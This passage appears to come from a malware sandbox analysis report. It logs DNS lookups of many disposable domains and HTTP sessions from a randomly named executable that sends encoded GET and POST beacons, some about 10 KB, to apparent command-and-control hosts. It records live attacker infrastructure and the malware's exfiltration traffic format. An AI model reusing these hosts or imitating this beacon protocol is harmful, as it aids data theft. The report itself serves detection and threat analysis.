                                                                                                                          Jan 15, 2025 18:17:50.059381008 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653280020 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653325081 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653352976 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653384924 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653465986 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653491020 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:50.653592110 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.653661013 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.659327984 CET5003180192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:50.664268970 CET8050031213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:55.785372019 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:55.790165901 CET805003285.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:55.790337086 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:55.807677984 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:55.812467098 CET805003285.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:57.314152956 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:57.319221973 CET805003285.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:57.319327116 CET5003280192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.334229946 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.339014053 CET805003385.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:58.339091063 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.362605095 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:58.367351055 CET805003385.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:59.875850916 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:17:59.882539034 CET805003385.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:59.882662058 CET5003380192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:00.894669056 CET5003480192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:01.064205885 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.064325094 CET5003480192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:01.080929995 CET5003480192.168.2.485.159.66.93
                                                                                                                          Jan 15, 2025 18:18:01.085815907 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085829973 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085849047 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085859060 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085891962 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085901022 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.085961103 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.086011887 CET805003485.159.66.93192.168.2.4
                                                                                                                          Jan 15, 2025 18:18:01.086172104 CET805003485.159.66.93192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 15, 2025 18:15:52.730135918 CET | 192.168.2.4 | 1.1.1.1 | 0xd3aa | Standard query (0) | www.zucchini.pro | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:08.504482031 CET | 192.168.2.4 | 1.1.1.1 | 0x9fab | Standard query (0) | www.vh5g.sbs | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:21.879847050 CET | 192.168.2.4 | 1.1.1.1 | 0x442f | Standard query (0) | www.v89ey584d.shop | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:29.956666946 CET | 192.168.2.4 | 1.1.1.1 | 0x73cd | Standard query (0) | www.actionhub.live | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:43.509780884 CET | 192.168.2.4 | 1.1.1.1 | 0x9091 | Standard query (0) | www.100millionjobs.africa | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:57.606507063 CET | 192.168.2.4 | 1.1.1.1 | 0x5a7d | Standard query (0) | www.x3kwqc5tye4vl90y.top | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:05.887130022 CET | 192.168.2.4 | 1.1.1.1 | 0x497a | Standard query (0) | www.hwak.live | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:13.992167950 CET | 192.168.2.4 | 1.1.1.1 | 0x8965 | Standard query (0) | www.qzsazi.info | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:28.426510096 CET | 192.168.2.4 | 1.1.1.1 | 0xd94b | Standard query (0) | www.truckgoway.info | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:42.255425930 CET | 192.168.2.4 | 1.1.1.1 | 0x62f5 | Standard query (0) | www.aloezhealthcare.info | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:55.676601887 CET | 192.168.2.4 | 1.1.1.1 | 0x1f27 | Standard query (0) | www.letsbookcruise.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 15, 2025 18:15:52.776927948 CET | 1.1.1.1 | 192.168.2.4 | 0xd3aa | No error (0) | www.zucchini.pro |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:15:52.776927948 CET | 1.1.1.1 | 192.168.2.4 | 0xd3aa | No error (0) | www.zucchini.pro |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:08.516546011 CET | 1.1.1.1 | 192.168.2.4 | 0x9fab | No error (0) | www.vh5g.sbs |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:08.516546011 CET | 1.1.1.1 | 192.168.2.4 | 0x9fab | No error (0) | www.vh5g.sbs |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:21.891055107 CET | 1.1.1.1 | 192.168.2.4 | 0x442f | Name error (3) | www.v89ey584d.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:30.139853954 CET | 1.1.1.1 | 192.168.2.4 | 0x73cd | No error (0) | www.actionhub.live |  | 67.223.117.189 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:44.275736094 CET | 1.1.1.1 | 192.168.2.4 | 0x9091 | No error (0) | www.100millionjobs.africa | 100millionjobs.africa |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 18:16:44.275736094 CET | 1.1.1.1 | 192.168.2.4 | 0x9091 | No error (0) | 100millionjobs.africa |  | 136.243.64.147 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:16:57.814291000 CET | 1.1.1.1 | 192.168.2.4 | 0x5a7d | Name error (3) | www.x3kwqc5tye4vl90y.top | none | none | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:05.896148920 CET | 1.1.1.1 | 192.168.2.4 | 0x497a | Name error (3) | www.hwak.live | none | none | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:14.010452032 CET | 1.1.1.1 | 192.168.2.4 | 0x8965 | No error (0) | www.qzsazi.info |  | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:28.524152040 CET | 1.1.1.1 | 192.168.2.4 | 0xd94b | No error (0) | www.truckgoway.info | truckgoway.info |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 18:17:28.524152040 CET | 1.1.1.1 | 192.168.2.4 | 0xd94b | No error (0) | truckgoway.info |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:42.320882082 CET | 1.1.1.1 | 192.168.2.4 | 0x62f5 | No error (0) | www.aloezhealthcare.info |  | 213.171.195.105 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 18:17:55.780594110 CET | 1.1.1.1 | 192.168.2.4 | 0x1f27 | No error (0) | www.letsbookcruise.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 18:17:55.780594110 CET | 1.1.1.1 | 192.168.2.4 | 0x1f27 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 18:17:55.780594110 CET | 1.1.1.1 | 192.168.2.4 | 0x1f27 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
                                                                                                                          • www.zucchini.pro
                                                                                                                          • www.vh5g.sbs
                                                                                                                          • www.actionhub.live
                                                                                                                          • www.100millionjobs.africa
                                                                                                                          • www.qzsazi.info
                                                                                                                          • www.truckgoway.info
                                                                                                                          • www.aloezhealthcare.info
                                                                                                                          • www.letsbookcruise.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49742 | 13.248.169.48 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:15:52.802956104 CET | 383 | OUT | GET /tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw= HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.zucchini.pro
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Jan 15, 2025 18:15:58.465424061 CET | 372 | IN | HTTP/1.1 200 OK
                                                                                                                          content-type: text/html
                                                                                                                          date: Wed, 15 Jan 2025 17:15:58 GMT
                                                                                                                          content-length: 251
                                                                                                                          connection: close
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49839 | 188.114.97.3 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:16:08.537873030 CET | 639 | OUT | POST /54nj/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/54nj/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNO0o1TFAbBrSoQyOABKA6L8JNC4E4A6aRQ==
Jan 15, 2025 18:16:09.264993906 CET | 1079 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:09 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjVFFa5CzUa6XZiXL39Cbs1S1Aa8lJn6aPTQqR%2Fgb%2FwQ0unjC2l9wuPu%2FLd8fckeIYlHoORHpfGrYJ994Us5JNn8nub9oXU8u779RznMutPyOl7uKp25x%2FFocxVygog%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027830c0e2ea2b4-YUL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17819&min_rtt=17819&rtt_var=8909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=639&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 15, 2025 18:16:09.265974998 CET | 173 | IN
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49858 | 188.114.97.3 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:16:11.093838930 CET | 659 | OUT | POST /54nj/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/54nj/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=uS1c8tUP40fu6zNyGZBBmLBnjEyYBQ2YKgOin4VzZ6hz7BV4GBv7Iv4t9ttjF9JEsAy1iZtlDurhnL5VKbBj+sIrIXZBXfmEAmWl/g2AlrFmdM06KTQAiW81QGroG0omCec9tGPNs2Ew4UgqBrtYLlR0QWDS2DJKVd5hzSlHDBvkg2/URwrXoLY6QFxw1DHTKUIspF1yhvo2EMg/li4ykoY=
Jan 15, 2025 18:16:11.730663061 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R4In%2BoOjvQoZCR0blPPePCa8z87CjR7Sd69%2F1lea8QC9ksNC35P0ABJs6kllIzxilgngw9ntFLM7Usrq4cpF%2BO9qdP9lt7rjOdJN1tsrRi8wvmUjtSGHRdJpzolxsy4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027831bc8d7f26c-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8184&min_rtt=8184&rtt_var=4092&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=659&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></ht
Jan 15, 2025 18:16:11.730699062 CET | 12 | IN
                                                                                                                          Data Ascii: ml>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49876 | 188.114.97.3 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:16:13.650338888 CET | 10741 | OUT | POST /54nj/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/54nj/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Jan 15, 2025 18:16:14.310547113 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:14 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EphGCK5zEapVcsMazb4%2BhKK2kF6pJwHVrseWHWiOgTlYk4m4shLgWHopE4np19nPmpseoz9PM6gH4%2BR3l8aSjYs1mqcqKwXlRWQwALV36unrY5nFw8xxbGKgaJXsdlI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027832bea7fa306-YUL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17716&min_rtt=17716&rtt_var=8858&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10741&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body><
Jan 15, 2025 18:16:14.310611963 CET | 15 | IN
                                                                                                                          Data Ascii: /html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49892 | 188.114.97.3 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:16:16.193290949 CET | 379 | OUT | GET /54nj/?V0=jQd8/d8A1xfb/FB4a5ld7s51nRiuWU3OCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JhvpvAlNBW96dL3eN6Dv39YB+Yc5uDns7m3I=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Jan 15, 2025 18:16:16.860996008 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:16 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0IDSNzfz4AqQWpCfrjoiT3%2BBucdDiIfHiTx47wUn%2BrY4zSer0FvLFuRbb80gIzoSGV%2BGzJKrz0af4QLnAo5olsBSbqxEzz3AkZ5CjjIKQ8Hc4rwQ4X%2BuKHSANKeiMY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9027833bc969c591-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8179&min_rtt=8179&rtt_var=4089&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=379&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></
Jan 15, 2025 18:16:16.861011028 CET | 14 | IN | Data Raw: 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49980 | 67.223.117.189 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:16:30.163305044 CET | 657 | OUT | POST /gq43/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.actionhub.live
                                                                                                                          Origin: http://www.actionhub.live
                                                                                                                          Referer: http://www.actionhub.live/gq43/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=s91Hn1DiB/xFd0TNFRvGLIqEImCSeYmD8kvCoUQ/4/KdMRko4nM/HoSnsMGm3hgFlL5wwUimPFG8vfIuXNJ+CelOhjMMokzXNBv4fDj1v16A5NsnZw6RLKgp+17pf1DgmkB0X9+1kj1jh1VMc472fcHX6EEcVBjfyfgF4848D9GaQxPnHlwrv9tTErpsRJNO6g==
Jan 15, 2025 18:16:30.759963989 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:30 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49999 | 67.223.117.189 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:16:32.713108063 CET | 677 | OUT | POST /gq43/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 219
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.actionhub.live
                                                                                                                          Origin: http://www.actionhub.live
                                                                                                                          Referer: http://www.actionhub.live/gq43/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Ascii: V0=s91Hn1DiB/xFdUjNH27GNoqHHGCSHomP8kjCoW8v/N+dN0Ao7mM/GoSnnsHs9BgelL1SwRamPFC8vasuXa19COlM4TMKskzXNBv4fCHbv1yA5dcnbVaWVagq517pb1DkmkBGX8iTklpjh0lMfp71GMG9n0FuYjmH0tlEwukSBvaIR3C9WUR899JgZsgYcKwHhinBCs684gThpetEOB3YPKo=
Jan 15, 2025 18:16:33.364851952 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:33 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 50014 | 67.223.117.189 | 80 | 4564 | C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 18:16:35.260384083 CET | 10759 | OUT | POST /gq43/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.actionhub.live
                                                                                                                          Origin: http://www.actionhub.live
                                                                                                                          Referer: http://www.actionhub.live/gq43/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:16:35.922044039 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:35 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
